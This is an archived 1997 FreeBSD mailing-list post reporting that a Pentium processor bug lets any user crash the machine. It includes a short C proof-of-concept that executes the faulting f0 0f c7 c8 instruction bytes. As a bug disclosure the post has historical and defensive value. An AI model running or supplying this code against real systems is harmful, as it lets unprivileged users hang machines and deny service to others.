From owner-freebsd-questions Sun Nov 9 17:01:25 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id RAA19667 for questions-outgoing; Sun, 9 Nov 1997 17:01:25 -0800 (PST) (envelope-from owner-freebsd-questions) Received: from relay.acadiau.ca (root@relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id RAA19658 for ; Sun, 9 Nov 1997 17:01:21 -0800 (PST) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with SMTP id UAA15412 for ; Sun, 9 Nov 1997 20:59:17 -0400 (AST) Received: by dragon.acadiau.ca id UAA23095; Sun, 9 Nov 1997 20:59:14 -0400 From: 026809r@dragon.acadiau.ca (Michael Richards) Message-Id: <199711100059.UAA23095@dragon.acadiau.ca> Subject: Crashing FreeBSD To: freebsd-questions@freebsd.org Date: Sun, 9 Nov 1997 20:59:13 -0400 (AST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Well folks, it looks like anyone can crash a FreeBSD box. I am told that this is a bug in the pentium processor. Compile and run, it will crash the machine right away... Very simple: char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; main () { void (*f)() = x; f(); }